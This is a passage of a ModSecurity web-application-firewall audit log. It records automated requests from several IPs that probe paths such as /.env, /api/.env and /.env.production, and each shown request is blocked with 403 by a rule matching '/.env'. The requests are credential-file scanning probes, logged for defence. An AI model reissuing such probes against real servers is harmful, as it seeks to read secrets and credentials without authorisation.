--91cfff69-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PgAAABg 103.236.140.4 40078 103.236.140.4 8181 --91cfff69-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --91cfff69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91cfff69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775667511 660 (- - -) Stopwatch2: 1745417775667511 660; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cfff69-Z-- --d2fb4e2f-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PwAAAAU 103.236.140.4 40080 103.236.140.4 8181 --d2fb4e2f-B-- GET /dev/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d2fb4e2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2fb4e2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775903951 651 (- - -) Stopwatch2: 1745417775903951 651; combined=230, p1=193, p2=0, p3=0, p4=0, p5=37, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2fb4e2f-Z-- --9bd86d1c-A-- [23/Apr/2025:21:16:16 +0700] aAj2MDI97BrbgvDq16RQvQAAAMs 103.236.140.4 40082 103.236.140.4 8181 --9bd86d1c-B-- GET /new/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9bd86d1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bd86d1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776069828 742 (- - -) Stopwatch2: 1745417776069828 742; combined=265, p1=219, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bd86d1c-Z-- --32fbe004-A-- [23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QAAAABE 103.236.140.4 40088 103.236.140.4 8181 --32fbe004-B-- GET /new/.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --32fbe004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32fbe004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776346466 692 (- - -) Stopwatch2: 1745417776346466 692; combined=309, p1=275, p2=0, p3=0, p4=0, p5=34, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32fbe004-Z-- --bb91514a-A-- [23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QQAAABY 103.236.140.4 40090 103.236.140.4 8181 --bb91514a-B-- GET /new/.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --bb91514a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb91514a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776512449 681 (- - -) Stopwatch2: 1745417776512449 681; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb91514a-Z-- --1d4e3524-A-- [23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QgAAAAM 103.236.140.4 40092 103.236.140.4 8181 --1d4e3524-B-- GET /new/.env.staging HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1d4e3524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4e3524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417776697243 636 (- - -) Stopwatch2: 1745417776697243 636; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4e3524-Z-- --9a75514d-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SQAAAAA 103.236.140.4 40116 103.236.140.4 8181 --9a75514d-B-- GET /awstats/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9a75514d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a75514d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778195449 660 (- - -) Stopwatch2: 1745417778195449 660; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a75514d-Z-- --fa18f33e-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SgAAAAE 103.236.140.4 40118 103.236.140.4 8181 --fa18f33e-B-- GET /conf/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fa18f33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa18f33e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778361461 613 (- - -) Stopwatch2: 1745417778361461 613; combined=251, p1=221, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa18f33e-Z-- --a472310c-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SwAAAA8 103.236.140.4 40120 103.236.140.4 8181 --a472310c-B-- GET /cron/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a472310c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a472310c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778576168 626 (- - -) Stopwatch2: 1745417778576168 626; combined=263, p1=232, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a472310c-Z-- --6d7b726f-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517TAAAAAk 103.236.140.4 40122 103.236.140.4 8181 --6d7b726f-B-- GET /www/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6d7b726f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d7b726f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778741992 679 (- - -) Stopwatch2: 1745417778741992 679; combined=262, p1=232, p2=0, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d7b726f-Z-- --d5093154-A-- [23/Apr/2025:21:32:42 +0700] aAj6Cj1ahuoJLEjKiAUe8AAAAJY 103.236.140.4 54214 103.236.140.4 8181 --d5093154-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d5093154-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5093154-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418762499010 811 (- - -) Stopwatch2: 1745418762499010 811; combined=328, p1=293, p2=0, p3=0, p4=0, p5=35, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5093154-Z-- --d2783f1e-A-- [23/Apr/2025:21:32:43 +0700] aAj6CxuwXEWV6ydgl51-aQAAAAg 103.236.140.4 54224 103.236.140.4 8181 --d2783f1e-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d2783f1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2783f1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418763816851 846 (- - -) Stopwatch2: 1745418763816851 846; combined=327, p1=287, p2=0, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2783f1e-Z-- --1937cc00-A-- [23/Apr/2025:21:32:45 +0700] aAj6DTI97BrbgvDq16RTZgAAANU 103.236.140.4 54242 103.236.140.4 8181 --1937cc00-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1937cc00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1937cc00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418765137858 777 (- - -) Stopwatch2: 1745418765137858 777; combined=290, p1=253, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1937cc00-Z-- --d9e0af30-A-- [23/Apr/2025:21:32:46 +0700] aAj6DtIw_rqnm4P5_ae3TgAAAFA 103.236.140.4 54264 103.236.140.4 8181 --d9e0af30-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d9e0af30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9e0af30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418766451299 834 (- - -) Stopwatch2: 1745418766451299 834; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9e0af30-Z-- --315d6738-A-- [23/Apr/2025:21:32:57 +0700] aAj6GRuwXEWV6ydgl51-bQAAABA 103.236.140.4 54462 103.236.140.4 8181 --315d6738-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --315d6738-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --315d6738-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418777124590 799 (- - -) Stopwatch2: 1745418777124590 799; combined=301, p1=267, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --315d6738-Z-- --5d13f715-A-- [23/Apr/2025:21:32:58 +0700] aAj6GhuwXEWV6ydgl51-bwAAAAA 103.236.140.4 54476 103.236.140.4 8181 --5d13f715-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5d13f715-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d13f715-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418778435978 867 (- - -) Stopwatch2: 1745418778435978 867; combined=369, p1=337, p2=0, p3=0, p4=0, p5=31, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d13f715-Z-- --a39cb55f-A-- [23/Apr/2025:22:17:41 +0700] aAkElTI97BrbgvDq16RcrgAAANc 103.236.140.4 37162 103.236.140.4 8181 --a39cb55f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 Accept-Charset: utf-8 --a39cb55f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a39cb55f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745421461991897 902 (- - -) Stopwatch2: 1745421461991897 902; combined=322, p1=271, p2=0, p3=0, p4=0, p5=51, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a39cb55f-Z-- --864ddc30-A-- [23/Apr/2025:23:13:21 +0700] aAkRoT1ahuoJLEjKiAU05QAAAII 103.236.140.4 38022 103.236.140.4 8181 --864ddc30-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --864ddc30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --864ddc30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801387951 861 (- - -) Stopwatch2: 1745424801387951 861; combined=325, p1=287, p2=0, p3=0, p4=0, p5=38, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --864ddc30-Z-- --1d19c751-A-- [23/Apr/2025:23:13:21 +0700] aAkRodIw_rqnm4P5_afOIwAAAFE 103.236.140.4 38032 103.236.140.4 8181 --1d19c751-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1d19c751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d19c751-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801581101 717 (- - -) Stopwatch2: 1745424801581101 717; combined=267, p1=235, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d19c751-Z-- --7e13607e-A-- [23/Apr/2025:23:13:21 +0700] aAkRoRuwXEWV6ydgl52X0gAAAAs 103.236.140.4 38034 103.236.140.4 8181 --7e13607e-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7e13607e-F-- 